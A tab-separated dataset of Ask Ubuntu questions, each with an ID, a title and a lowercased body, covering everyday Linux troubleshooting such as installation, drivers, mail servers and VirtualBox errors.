452101	installing ubuntu on laptop via second computer	i 'm trying to install ubuntu on an old vaio system , and the biggest problem is the fact that the disc-drive is broken , and there is absolutely no way to make it boot from usb . having a broken system and no way to boot into an alternative , the only thing i believe will help me is remove the harddisk ( done ) , hook it up to another machine , install ubuntu , and put it back in . now remove the disk is a real pain on these machines , and i rather not have a second go at it if i can avoid it . so i need to be as sure as possilbe that the boot manager ( grub ) is installed correctly before i reinstall the disc . i have no machines that actually take this kind of ( old ide/pata ) disc natively , so i 've hooked it up using an usb connector . this means that a `` does it boot another machine '' test will be not very close to the final situation . this boils down to : how can i install ubuntu on an external disc , meant to be a disc that goes into another machine how can i install a bootloader on that disc , so it will actually boot .
452102	dual vertical monitors messes my desktop	when i enable my two monitors in vertical positions my desktop files get dispersed vertically among both screens and the file icons on the upper screen are displaced , they look like they are cropped the black space on the upper screen is due to the resolution difference . how can i automatically arrange my icons in the lower screen only and in a proper way ? i tried right-clicking on the screen and choosing to `` organize desktop by name '' but it did n't do the trick .
452103	qml : what is the difference between a component , element , property , attribute , and object ?	the reason why i ask , is that often languages define the same terms differently , and qml is fairly unique in some regards . a brief explanation or analogy is preferred , where as more extensive and detailed explanations should be linked as further reading . thanks
452106	upgrading ubuntu slows laptop down	i 've a question considering upgrading ubuntu to the new version . i 've changed from 13.04 to 14.04 the system works great . i 've noticed that if you upgrade the system it always gets slower . it is like having a a part of the old system still on the computer . is there a possibility to `` clean up '' all the old stuff thats left over ? for example : i 've created a password to encrypt before the computer is started but now it loads first something and then goes into the `` old mode '' for entering the password like in 13.04 thanks in advance
452107	can not mountexternalstorage ( ) : invalid argument in emmc card board	my android-3.4 kernel board is using emmc card ( flash ) and during the bootup time i am getting the following error message and because of that my board is not booting . can you please give me suggestions ? error at adb shell : can not mountexternalstorage ( ) : invalid argument thanks .
452108	can not change screen size from 640x480 after 14.04 installation on virtualbox osx	after installing ubuntu 14.04 guest on virtualbox running on a max osx host , i am stuck with 640x480 screen resolution . adding guest additions again does n't help . previous ubuntu installations are fine with bigger resolution . the 'detect displays ' button on the 'display settings ' settings screen is not reachable , because 640x480 is too small . i could not find a /etc/x11/xorg.conf file to configure manually .
452111	open ports on lan	i am trying to use vlc remote for android and clementine remote for android . vlc is configured properly with hosts allowed . my laptop ip is also dmz in the router . i am still getting an error when trying to connect from android . is there a way to check if port 5500 and 8080 is accepting lan traffic ? edit : other services such as python -m simplehttpserver on any port does not work this is elementaryos luna ( ubuntu 12.04 )
452112	apache2 ca n't see files or folders	i installed apache2 using this command sudo apt-get install lamp-server^ but now when i start it by typing localhost in browser i only see message index of / and there is no any files or folders . tried to create index.html and index.php but i got same results . is there any fix for this ?
452119	how to install a skydrive client ?	is there a way to setup skydrive sync service on ubuntu ? according to winehq i can not use wine to install skydrive so i am looking for a way to install it on linux
452120	system tray icons for gnote and mail-notification	after upgrading my desktop from precise to trusty , some icon notifications are not shown anymore . specifically they are the ones for gnote and mail-notification . how can i get them back ? i run unity desktop environment .
452121	questions about libreoffice writer	i 'm using libreoffice version : 4.2.3.3 64 bit on xubuntu 14.04 . i have questions regarding libreoffice writer . how to change the scrolling down effect ? one page to the right , the other to the left , i want to make the pages aligned in the middle as i scroll down , just like ms word or any word processor , i do n't like the way libreoffice writer scroll down the pages . how to make libreoffice writer paste text correctly . this is a random text copied from a text editor ? the paragraphs are aligned here and there , they do not fill the whole page , i tried changing the page options but it 's not fixed
452125	redirect ufw logs to own file ?	is there a way i can easily redirect the entries for ufw to their own log file at /var/log/ufw instead of filling up /var/log/syslog as it 's becoming tricky to find solutions to problems with all this ufw stuff flying past me ?
452126	can not access the file : permission denied - virtualbox	i have downloaded virtualbox in order to run android in it i have set up everything and tried to start it but unfortunately 2 errors have came up . failed to open a session for the virtual machine android . the virtual machine 'android ' has terminated unexpectedly during startup with exit code 1 details : result code : ns_error_failure ( 0x80004005 ) component : machine interface : imachine { 480cf695-2d8d-4256-9c7c-cce4184fa048 } kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing /etc/init.d/vboxdrv setup as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . so it typed in the /etc/init.d/vboxdrv setup into the terminal and that 's what came up : /etc/init.d/vboxdrv setup stopping virtualbox kernel modules ... done . recompiling virtualbox kernel modules /etc/init.d/vboxdrv : 334 : /etc/init.d/vboxdrv : can not create /var/log/vbox-install.log : permission denied ... failed ! ( look at /var/log/vbox-install.log to find out what went wrong ) after that as it was saying in the terminal i typed in /var/log/vbox-install.log to check out what went wrong . /var/log/vbox-install.log bash : /var/log/vbox-install.log : permission denied as the permission is denied i have typed in 'su sudo ' to be as root : su sudo /var/log/vbox-install.log no passwd entry for user 'sudo' so i tried : su /var/log/vbox-install.log no passwd entry for user '/var/log/vbox-install.log' and then : sudo /var/log/vbox-install.log [ sudo ] password for mroovka : sudo : /var/log/vbox-install.log : command not found so i just typed in 'su ' then tried to check the /var/log/vbox-install.log again but the outcome was ... mroovka @ mroovka-n102sp-n100sp-n101sp : ~ $ su password : root @ mroovka-n102sp-n100sp-n101sp : /home/mroovka # /var/log/vbox-install.log bash : /var/log/vbox-install.log : permission denied so i do n't really know what to do , as i have only one account and i am the administrator . thank you in advance for your help . ps . i know this question may be duplicate but i read a lot about it and it is very challenging for me to solve this issue .
452128	intel graphics installer on ubuntu 14.04 trusty thar	is there a way to install the the intel graphics installer for linux on ubuntu 14.04 ? i installed the ubuntu 13.10 64-bit version from here but i get operating system not supported error when trying to upgrade my graphics driver . is there a way to work around this issue ? thanks !
452130	how to install utorrent.tar.gz on ubuntu 13.10 ?	i know to install software from terminal using some sudo apt-get stuffs but i ca n't install utorrent by terminal . so , i download .tar.gz from their website . so please instruct me how to install .tar.gz or say the way to install it from terminal friends .
452131	why is a very small percentage of the swap being used when my ubuntu is almost freezing ?	my ubuntu gets very slow because of too many apps , but when i check the system monitor , ram use is 80 % but swap is less than 5 % . how do you let ubuntu use the swap more effectively ?
452133	how can i access my windows 7 drives in ubuntu ?	hi i just installed ubuntu over my windows 7 installation . now only ubuntu is installed on my system . but the thing is i want to access my other 3 drives which i have in windows 7 that contains my personal stuff : movies , pictures etc . i do n't have any other operating system on my system so i want to use them on this drive . please help . how can i access these drives and show them on my computer ?
452134	clients ca n't connect to owncloud	i recently installed a owncloud server on a remote computer . the owncloud client software is in sync with the server . but nautilus , thunderbird lightning or evolution can connect to the dav ressources . the server does n't seem to accept my password . the version is owncloud 6.0.1+dfsg-1ubuntu1 ( debian ) ( stable ) for owncloud and ubuntu 14.04 for the server ( and the client computer ) . any ideas ? thanks in advance , markus
452140	how can i lock the screen in xubuntu 14.04 ?	xubuntu 14.04 uses light locker and it is advised that one uninstalls xscreensaver . is it possible to lock the screen or do i have to install some other program for that ?
452143	can i install windows 7 after installing ubuntu ?	i already installed ubuntu ; i 'm attempting to install windows 7 but i cant because my hard drive is a different file system format . steps i 've tried i attempted to format part of my disk to make room for windows 7 , but on the list of partitions in the ubuntu installer i ca n't change the partition type to primary . as such it 's impossible to install windows 7 . i also tried to run my windows 7 iso image using ubuntu since i ca n't figure out the proper install order , i thought i 'd start by asking here . i also have 3 extra hard drives , so if anyone can help i 'd appreciate it . is there any way for efficiency sake to have windows 7 one click away , say for example to open ubuntu and run the windows 7 installer on a different disk ? is it possible to do it this way , if not what is the correct way ? thanks
452148	ubuntu 14.04 new install on dell laptop	i managed to burn the latest version to dvd and installed it on a dell latitude laptop having windows xp pro . end result is the laptop will not reboot to either os ! after ubuntu was done installing i clicked the `` restart '' button and nothing happened . i was forced to simply shut the laptop down . so where do i go from here now that the laptop is useless ?
452149	disk image without wasting space	i own a single 12.04 lts dedicated server hosted somewhere in the world by a private company . i have spent some time setting it up ( web , dns and mail services ) and securing it . now that i am satisfied with the result , i would like to make a disk image of the system partition , so that i can quickly reinstall a copy in case of hdd failure . my system is setup as follow : filesystem size used avail use % mounted on rootfs 20g 1.3g 17g 8 % / udev 984m 4.0k 984m 1 % /dev tmpfs 199m 280k 199m 1 % /run /dev/sda1 20g 1.3g 17g 8 % / none 5.0m 4.0k 5.0m 1 % /run/lock none 994m 0 994m 0 % /run/shm /dev/sda3 193g 1.2g 182g 1 % /var /dev/sda4 244g 1.4g 230g 1 % /backup /dev/sda3 193g 1.2g 182g 1 % /var/www/clients/client2/web1/log /dev/sda3 193g 1.2g 182g 1 % /var/www/clients/client1/web2/log /dev/sda3 193g 1.2g 182g 1 % /var/www/clients/client1/web3/log /dev/sda3 193g 1.2g 182g 1 % /var/www/clients/client1/web4/log /dev/sda3 193g 1.2g 182g 1 % /var/www/clients/client1/web5/log i have the possibility of booting the server from network , and of selectively mounting partitions . the plan is to mount /dev/sda4 in /backup and to make a disk image of /dev/sda1 in a file /backup/diskimage the issue is : i would like the disk image to only store useful data ( i.e . i expect it to be 1.3g , not 20g ) so that i can later transfer it over internet to a backup location . in case of a hard drive failure , i need to be able to quickly perform the process in reverse , and transferring the disk image to / from the server is the bottleneck . from what i understand , dd is not the right tool to build such disk image . what tool can i use ? how can i use it ? would it be sufficient for me to : tar : /sbin , /bin , /etc , /ispconfig , /lib , /lib64 , /opt , /root , /usr , /var plug in a new hdd , partition it exactly like the previous one install 12.04 lts + all the packages i installed before ( that can be automated and is fast ) then , untag all the folders above over my system . would it restore all the apache , postfix , etc… configuration as well as the users and groups that were created on the system the first time with their uids ? this is the key point that 's keeping my current backup solution from working . once restored , the server ca n't work because users such as web1 , client1 , etc… are n't created ( so apache refuses to start ) . the issue is i have a lot of them , and i need to recreate them with the right uids and groups… here starts the nightmare ... thanks for your help .
452157	how can i lock my screen without turning off the monitor ? ( xubuntu 14.04 )	xubuntu 14.04 when locking my screen , my monitor/screen turns off immediately . i do n't want that to happen immediately , i 'd like to have period of about 20-60 minutes or so between the two things . is that possible ? whatever i set the first two sliders to , invoking xflock4 via ctrl + shift + del always switches my monitor off :
452158	gksu nautilus closing when opened properties of a folder	i did gksu nautilus , went to /var/lib/tomcat7/webapps . when i open properties to see it crashes with this error . deepen @ deepen91 : ~ $ gksudo nautilus nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory . please ask your system administrator to enable user sharing . i googled it & got that we need install samba for this error . samba is for sharing folders and files with windows . how does this help ? or is there any other solution please tell . any help will be appreciated !
452159	ubuntu 14.04 multi touch screen support	just installed 14.04 . it seems to be converting all my screen touch gestures to mouse gestures . and it only supports one point touch . it is supposed to support ten touch points ( tested with windows 8.1 ) . am i missing something here ? do i have to install some kind of package ? or is it just not supported ? test - being able to draw here : http : //www.paulirish.com/demo/multi
452161	hp laser jet 1020 plus installation	in ubuntu 12.04 on switching on the printer the system automatically recognized the plug in but in ubuntu 14.04 this would not happen . i wish someone would show me the method by which i can install hp laserjet 1020 plus driver and plugin easily .
452164	what is the difference between ubuntu.components and qtquick ?	qtquick 2.0 ubuntu.components 0.1 are two common imports when developing applications for ubuntu . are these classes ? can you import member functions this way ? if yes , how can tell what member functions are available for importing ? is there any reason why i should import qtquick 1.x , or is it generally reasonable to assume that the latest version is what i should be using ? how do i tell what the latest version of either is ? broadly speaking ; what functionality do these imports actually provide ?
452169	how to import xml data to a fillable pdf file in linux ?	i have a fillable pdf template . also have a xml file which is extracted from this fillable pdf file . how can i export xml file from these fillable pdf files and also how can i create a normal pdf file from the the xml files or how can i import the xml files to these fillable xml files ? i 'm new in these things .
452170	lubuntu - adding more workspaces ?	i 'm on lubuntu 14.04 and using it on a bootable usb drive . how do i add more workspaces ? right now there are two workspaces , but those were there by default . do i have to download additional software to manage the workspaces ?
452176	can not update to gnome 3.12	ok , i tried to avoid asking this question here , as it 's noobish and and always closed/downvoted , but i can not figure it out myself . i 'm on 14.04 and trying to update gnome from 3.10 to 3.12 . most blogs and such link to this ppa . but i can not figure out how . i added the ppa , i updated the list of repos but still the 3.12 is nowhere to be found . how can i do it ? i ran out of ideas ...
452177	13.10 can not connect to home wireless network but windows can	i am unable to connect to my home network in ubuntu 13.10 . it says it is connected in the system tray . but when i open a browser or software center , it just loads and loads and nothing ever happens . i am dual booting windows . windows has no problem at all connecting . this issue is sporadic . sometimes ubuntu can connect and sometimes it can not . this is only happening on my home network . i have no problems connecting to other networks at all , even friendâs secured wireless networks . any ideas on what i should be checking ? i can provide any information needed .
452179	my hardware configuration is enough for ubuntu 64 bits ?	guys ! i use the ubuntu 14.04 lts 32 bit version , and i 'm thinking to install the 64 bit version . is that a good idea with this configuration ?
452180	how to get gimp 2.6.6 on ubuntu 14.04	i am using ubuntu 14.04 and i need gimp 2.6.6 for a class . i tried to get it by typing sudo apt-get install gimp=2.6.6-1ubuntu1 however , it said e : version '2.6.6-1ubuntu1 ' for 'gimp ' was not found any ideas ?
452181	upgrade option is disabled while trying to upgrade to 14.04 using dvd	i tried to upgrade my ubuntu 13.10 to 14.04 using dvd . when i want to upgrade , upgrade option is disabled . it seems i have to erase 13.10 , so all of programs will be deleted . what 's the problem ? why i ca n't upgarade ?
452182	is it possible to know which recognized flavor i am running using terminal ?	i have a set of functions in bash script which i want to run only on particular flavors of ubuntu . for example , i want to run the following if i am running unity : gsettings set com.canonical.indicator.datetime show-week-numbers true but the following if i am running ubuntu gnome : gsettings set org.gnome.shell.calendar show-weekdate true and similarly , different commands for different flavors of ubuntu . i have tried to see the contents of /etc/os-release , but it does n't give any information about the flavor of ubuntu . the following is when run on ubuntu gnome : $ cat /etc/os-release name= '' ubuntu '' version= '' 14.04 , trusty tahr '' id=ubuntu id_like=debian pretty_name= '' ubuntu 14.04 lts '' version_id= '' 14.04 '' home_url= '' http : //www.ubuntu.com/ '' support_url= '' http : //help.ubuntu.com/ '' bug_report_url= '' http : //bugs.launchpad.net/ubuntu/ '' is it possible to know which recognized flavor i am running using terminal ? i would prefer a solution which works out of the box , without installing any other packages for both live and installed environments . looking for what packages are installed is a possibility , but i would prefer not to go that route , although you are welcome to give an answer in that direction .
452183	flash player for other browsers	how can i get flash player for other browsers in ubuntu ? i 've trued flashplayer-installer , adobe-flashplugin , any ideas lads ?
452186	lenovo e530 charging problem on ubuntu	i have lenovo e530 laptop . and sometimes i have charging problem . it doesnt want to charge over specified battery % . sometimes its 17 % , sometimes 50 % , number is changing . where should be a problem ? exists some special drivers for thinkpads on ubuntu ? ( in windows i solve this problem by installing power manager from lenovo , but i`m not sure if exists something for ubuntu or linux ) . what do u suggest ?
452187	ubuntu 14.04 upgrade problem - no desktop	i recently upgraded from ubuntu 13.10 to 14.04 ( both 64-bit ) . initially , i tried the upgrade that runs from 13.10 ( the one that pops up on the desktop to tell you there 's a new release ) , but it errored out . i decided to create a bootable usb key with 14.04 on it and try the upgrade path off the key . the upgrade ran and completed without issue . initially , when 14.04 booted up , it takes me to the unity greeter . i selected my user id and entered my password , which it seemed to accept , then promptly returned me back to the unity greeter as if my password was not correct . i rebooted and went to an emergency root shell , re-set each of the users passwords to ensure they were correct , and rebooted again . now , upon entering my password at the unity greeter , it accepts the password , but takes me to an empty graphical screen showing just the background and a mouse cursor . no menus , side bar or right-click on the desktop menus . the video display all seems to be ok , but i 'm not getting a desktop , regardless of which user tries to log in . i 've tried the steps in this post with no luck ... interestingly enough , i can log in as `` guest '' and get a desktop , user a browser , etc . while dropped at the shell , it looked like /home/ directory permissions had been altered , and chown 'd them all to be username : username again . any good ideas what to try next ?
452190	problem booting 14.04	after the update today to 14.04 , ubuntu can boot using the old kernel ( 3.11.0-19-generic ) and 3.13.0-24-generic also can boot when in recovery mode ( but with a very low resolution of 640x480 only ) . in normal mode however 3.13.0-24-generic does not leave the `` booting '' screen . any suggestions what i should investigate to find what the problem is ? kind regards daniel
452192	how to install plone ?	i 'm trying to install plone . the installer says : $ sudo ./install.sh usage : [ sudo ] install.sh [ options ] standalone|zeo install methods available : standalone - install standalone zope instance zeo - install zeo cluster use sudo ( or run as root ) for server-mode install . options ( see top of install.sh for complete list ) : -- with-python=/full/path/to/python-2.7 path to the python-2.7 that you wish to use with plone . virtualenv will be used to isolate the install . -- build-python if you do not have a suitable python available , the installer will build one for you if you set this option . requires internet access to download python source . -- password=instancepassword if not specified , a random password will be generated . -- target=pathname use to specify top-level path for installs . plone instances and python will be built inside this directory ( default is /usr/local/plone ) -- clients=client-count use with the zeo install method to specify the number of zope clients you wish to create . default is 2 . -- instance=instance-name use to specify the name of the operating instance to be created . this will be created inside the target directory . default is 'zinstance ' for standalone , 'zeocluster ' for zeo . -- daemon-user=user-name in a server-mode install , sets the effective user for running the instance . default is 'plone_daemon ' . ignored for non-server-mode installs . -- owner=owner-name in a server-mode install , sets the overall owner of the installation . default is 'buildout_user ' . this is the user id that should be employed to run buildout or make src or product changes . ignored for non-server-mode installs . -- group=group-name in a server-mode install , sets the effective group for the daemon and buildout users . default is 'plone_group ' . ignored for non-server-mode installs . -- template=template-name specifies the buildout.cfg template filename . the template file must be in the buildout_templates subdirectory . defaults to buildout.cfg . -- static-lxml forces a static built of libxml2 and libxslt dependencies . requires internet access to download components . read the top of install.sh for more install options . but i already have ibxml2-dev and libxslt-dev installed , so how to install plone on ubuntu 14.04 ?
452193	postfix will not deliver mail to virtual mailbox owner	i 've been setting up postfix for virtual mailboxes for separate domains and non-linux accounts , according to the howto at https : //help.ubuntu.com/community/postfixvirtualmailboxclamsmtphowto but no matter what i try postfix keeps delivering incoming mail at the maildir folder of the local user ( /home/user/maildir/new ) , whereas it should be delivered to the virtual mailbox owner vmail ( /home/vmail/domain/user/new ) . it seems postfix simply completely ignores all virtual mailbox stuff in main.cf . no errors in the logs however . ubuntu server 12.04lts , postfix 2.9.6 . any clues of where to start ? output from postconf -n : alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no config_directory = /etc/postfix home_mailbox = maildir/ inet_interfaces = all mailbox_size_limit = 0 mydestination = localhost. $ mydomain , localhost , mail.bezoekerscentrumsonsbeek.nl myhostname = bcs mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = /etc/mailname readme_directory = no recipient_delimiter = + relayhost = smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes virtual_gid_maps = static:5000 virtual_mailbox_base = /home/vmail virtual_mailbox_domains = /etc/postfix/vhosts virtual_mailbox_maps = hash : /etc/postfix/vmaps virtual_minimum_uid = 1000 virtual_uid_maps = static:5000 output from log : apr 21 17:46:15 bcs fetchmail [ 12292 ] : 1 message for bezoekerscen24 at bezoekerscentrumsonsbeek.nl ( 2295 octets ) . apr 21 17:46:15 bcs postfix/smtpd [ 16893 ] : connect from localhost [ 127.0.0.1 ] apr 21 17:46:15 bcs postfix/smtpd [ 16893 ] : 84e13254da : client=localhost [ 127.0.0.1 ] apr 21 17:46:15 bcs postfix/cleanup [ 16896 ] : 84e13254da : message-id= < 53553d50.7070805 @ xs4all.nl > apr 21 17:46:15 bcs postfix/qmgr [ 16814 ] : 84e13254da : from= < *** @ xs4all.nl > , size=2652 , nrcpt=1 ( queue active ) apr 21 17:46:15 bcs fetchmail [ 12292 ] : reading message bezoekerscen24 @ bezoekerscentrumsonsbeek.nl:1 of 1 ( 2295 octets ) flushed apr 21 17:46:15 bcs postfix/local [ 16897 ] : 84e13254da : to= < adje @ localhost > , relay=local , delay=0.11 , delays=0.06/0.01/0/0.04 , dsn=2.0.0 , status=sent ( delivered to maildir ) apr 21 17:46:15 bcs postfix/qmgr [ 16814 ] : 84e13254da : removed apr 21 17:46:15 bcs postfix/smtpd [ 16893 ] : disconnect from localhost [ 127.0.0.1 ]
452194	exact image for downloading ubuntu 12.04	i have an hp laptop with ubuntu 12.04 issued by my college . but since i am more of a windows guy , i installed windows 8 to it . however , when the laptop was issued , i was told that i should not change the os . now that the academic year is ending , i have to give the laptop back to the college , and for that , i need to change the os back to ubuntu . can anyone tell me where can i download the exact os ? ? i do n't know what is this , here is the link to an image of the exact release version
452201	thunderbird does not delete mails on the server	i have thunderbird version 24.4.0 and ubuntu 14.04 - all fresh installed . when mails are downloaded , they remain on the server . i found no settings in the thunderbird where to tell him to delete the mails on the server after download them localy . do you know where it is ?
452203	unable to boot to windows	context : recently i 've bought an ssd . before that i had 2 hdds ; one being a 500gb drive with a w7 installation , and another 320gb drive containing two partitions , one of which for storage ( ntfs ) and another to hold a linux mint installation ( which i 'm currently on ) . when the ssd arrived i set up another w7 installation . once this was fully set-up , i wanted to format the 500gb drive to use it for storage . i 've done this today , and as a result wiped the windows loader from my system . ideally , what i would like is for the windows boot manager to be on the ssd , and a grub installation on the 320gb drive . then i 'd like the system to boot to the 320gb drive , and give options to load the windows boot manager , or boot to linux . since the windows drive can not be booted to , when running a w7 disc and using cli i get the error `` element not found '' when attempting to use `` recboot /fixboot '' . using /scanos does find my w7 installation however . i 've also set the w7 partition as active and rebooted , but had the same results . i 've also attempted using boot-repair , however my system still can not boot to windows . my current boot summary is here : http : //paste.ubuntu.com/7299901/ my current grub boot menu just lists the mint installations . how can i fix this to include a windows boot loader ? many thanks , david .
452204	how do i remove the dots from the lockscreen in ubuntu 14.04 ?	you can remove the dots from the login screen in 12.04-13.10 using this method . how do you remove the dots from the new lock screen in ubuntu 14.04 ?
452208	htk installation problem on ubuntu 14.04	i have already download and unpack htk-3.4.1 , then according to the htk installation guide i change the directory to this file then type `` ./configure -- prefix=/usr/local/bin.linux '' command . it work fine and provide me two necessary commands to install the tool ; these are : 1. make all to build htk and 2. make install to install htk , however when i enter the first command it displays this error ( cd htklib & & make htklib.a ) \ || case `` '' in k ) fail=yes ; ; * ) exit 1 ; ; esac ; make [ 1 ] : entering directory /tmp/htk/htklib' gcc -ansi -d_svid_source -doss_audio -d'arch= '' i686 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hgraf.o hgraf.c hgraf.c:73:77 : fatal error : x11/xlib.h : no such file or directory # include < x11/xlib.h > /* the x11 stuff makes string.h also available */ ^ compilation terminated . make [ 1 ] : *** [ hgraf.o ] error 1 make [ 1 ] : leaving directory/tmp/htk/htklib' make : * [ htklib/htklib.a ] error 1 please help me
452209	how to use supervisorctl on ubuntu ?	i 'm trying to install plumi and i did sudo apt-get install supervisor but ./bin/supervisord does n't work , nor ./bin/supervisorctl status sudo service supervisor status shows that it 's running but does not show what services are running so please tell me how supervisor work and how i could check what service are running
452212	significant errors on first time boot ?	just had a clean install of the latest version 14 lte desktop but it could not start after first boot . it displays messages ( please refer to attached images ) like `` significant errors , unable to mount ... .. '' ? when pressing `` i '' the message `` an error occurred while mounting / . '' `` press s to skip mounting or m for manual recovery '' when pressing , probably , `` s '' a message `` the disk drive for /tmp is not ready yet or not present . '' is displayed and on selecting any of the options it still does not boot up successfully ? and if i select the manual recovery or manual mounting an error message is displayed `` the plymouth not found '' . i have tried by reinstalling again by formatting my drive to give a clean install on my toshiba sattelite windows 8.1 laptop intel x64 using the following two different ubuntu versions but still no luck ? http : //releases.ubuntu.com/14.04/ubuntu-14.04-desktop-i386.iso.torrent http : //releases.ubuntu.com/12.04/ubuntu-12.04.4-desktop-i386.iso.torrent regards ,
452215	how best to install ubuntu 14.04 lts only to replace win 7 and ubuntu 14.04 beta 2 dual boot ?	my c : hdd has win 7 and data files ( all backed up several ways ) my d : hdd has xubuntu 14.04 beta 2 installed in 100gb partition for os , and also logical partitions e : and f : used for data backup . what is the best way to install or upgrade to the newly released ubuntu 14.04 lts and fully remove win 7 home 64 bit operating system from c : hdd ? my d ; hdd is newer and larger and the linux os could stay there , right ? it does n't have to be on the c ; hdd when the only os ? thanks for your advice !
452216	dependency not satisfiable fuse-utils	i have looked around and the answers for dependency problems seem to be specific but i am sorry if this has already been answered . i am trying to install storage made easy desktop client but when i double click the .deb file i get dependency not satisfiable fuse-utils the output from gdebi package manager is : e : storagemadeeasy : debian-changelog-file-missing e : storagemadeeasy : no-copyright-file w : storagemadeeasy : description-too-long w : storagemadeeasy : extended-description-line-too-long e : storagemadeeasy : depends-on-obsolete-package depends : fuse-utils w : storagemadeeasy : non-standard-executable-perm usr/share/sme_install/xml-simple-2.18.zip 0777 ! = 0755 w : storagemadeeasy : non-standard-dir-perm usr/share/sme_install/smeclient/ 0777 ! = 0755 w : storagemadeeasy : non-standard-dir-perm usr/share/sme_install/smeexplorer/ 0777 ! = 0755 w : storagemadeeasy : non-standard-dir-perm usr/share/sme_install/smesynccenter/ 0777 ! = 0755 w : storagemadeeasy : non-standard-dir-perm usr/share/smeclient/exp/files/big/ 0777 ! = 0755 w : storagemadeeasy : non-standard-dir-perm usr/share/smeclient/exp/files/small/ 0777 ! = 0755 w : storagemadeeasy : binary-without-manpage usr/bin/smemount e : storagemadeeasy : executable-desktop-file usr/share/applications/sme-client-kde.desktop 0755 e : storagemadeeasy : executable-desktop-file usr/share/applications/sme-client.desktop 0755 e : storagemadeeasy : executable-desktop-file usr/share/applications/smeexplorer2-kde.desktop 0755 e : storagemadeeasy : executable-desktop-file usr/share/applications/smeexplorer2.desktop 0755 e : storagemadeeasy : executable-desktop-file usr/share/applications/smesynccenter2-kde.desktop 0755 e : storagemadeeasy : executable-desktop-file usr/share/applications/smesynccenter2.desktop 0755 w : storagemadeeasy : desktop-command-not-in-package usr/share/applications/sme-client-kde.desktop smeclient w : storagemadeeasy : desktop-command-not-in-package usr/share/applications/sme-client.desktop smeclient w : storagemadeeasy : desktop-command-not-in-package usr/share/applications/smeexplorer2-kde.desktop smeexplorer w : storagemadeeasy : desktop-command-not-in-package usr/share/applications/smeexplorer2.desktop smeexplorer w : storagemadeeasy : desktop-command-not-in-package usr/share/applications/smesynccenter2-kde.desktop smesynccenter w : storagemadeeasy : desktop-command-not-in-package usr/share/applications/smesynccenter2.desktop smesynccenter w : storagemadeeasy : executable-not-elf-or-script usr/share/sme_install/xml-simple-2.18.zip w : storagemadeeasy : executable-not-elf-or-script usr/share/applications/smeexplorer2.desktop w : storagemadeeasy : executable-not-elf-or-script usr/share/applications/smesynccenter2.desktop w : storagemadeeasy : executable-not-elf-or-script usr/share/applications/smesynccenter2-kde.desktop w : storagemadeeasy : executable-not-elf-or-script usr/share/applications/smeexplorer2-kde.desktop w : storagemadeeasy : executable-not-elf-or-script usr/share/applications/sme-client-kde.desktop w : storagemadeeasy : executable-not-elf-or-script usr/share/smeclient/exp/files/folder.gif w : storagemadeeasy : executable-not-elf-or-script usr/share/applications/sme-client.desktop w : storagemadeeasy : possibly-insecure-handling-of-tmp-files-in-maintainer-script prerm:25 lintian finished with exit status 1 any ideas much appreciated
452217	youtube-dl list of videos problem	i downloaded the video from list using youtube-dl , but due to connectivity problem , i could n't complete my download all the videos . only 100 out of 200 videos were completed . after watching few videos , i deleted first 50 videos . now i want to continue download from 101st video . when i start download from list , it always starts from 1st video . is there any option available to start download from some specific video other than 1 ? extra info : my list link : https : //www.youtube.com/playlist ? list=pl2f07dbcdcc01493a which is video tutorial list . thank you
452218	how do i permanently turn off stick point and touchpad ? dell latitutde d800	i recently installed lubuntu and old dell latitude d800 laptop . i have a problems with the touchpad causing the cursor to jump around while typing ; and the stickpoint causing the pointer to either stay in on corner or another , or 'resist ' being moved by the usb mouse . using ask unbutu , i have located the terminal commands to temporarily turn off both ; but i then i must do this each time i reboot . is there a way to permanently turn off both ? as i am very new user of linux , i would appreciate a detailed explanation , and ask your forbearance with this issue . ps the old dell latitude d800 does n't have either a function key or key command to turn off the touchpad . thanks
452222	what xargs does exactly ?	i do n't understand exactly what xargs does that 's why i 'm surprised why these 2 return different results : find ~/downloads -iname *btsync* | ls -al find ~/downloads -iname *btsync* | xargs ls -al why the first one does n't return what i want ? instead it prints show all the files in the current directory .
452223	network-manager fails to enable network everytime after suspension , what can i do ?	i have done the upgrade to 14.04lts , after that , everytime i suspend my computer , when i turn it on , the network-manager fails to `` enable '' the network , and i always have to do : sudo restart network-manager it might be something mis-configured.. can anyone solve this ? thanks !
452225	postgrey - how to add sending server to whitelist to disable greylisting	i 'm using postgrey on all my mx servers ( main and 2 backups ) . i need to disable greylisting on a main server when receiving mails from backup server . how to do that ? when i add ip/fqdn to /etc/postgrey/whitelist_clients , it does n't help . specifying postgrey_opts= '' -- inet=10023 -- whitelist-clients=/etc/postgrey/whitelist_clients '' in /etc/default/postgrey did n't help either . thank you
452228	cnet network simulator	how to install the cnet network simulator in ubuntu 13.10 . why ca n't i install libelf package from apt-get install ? it says unable to locate package .
452234	sudo nautilus error	i have installed ubuntu 13.10 . when i run sudo nautius in the terminal this error appears : gtk-warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ( nautilus:2904 ) : ibus-warning ** : the owner of /home/mahsa/.config/ibus/bus is not root ! nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . please help me to solve this problem .
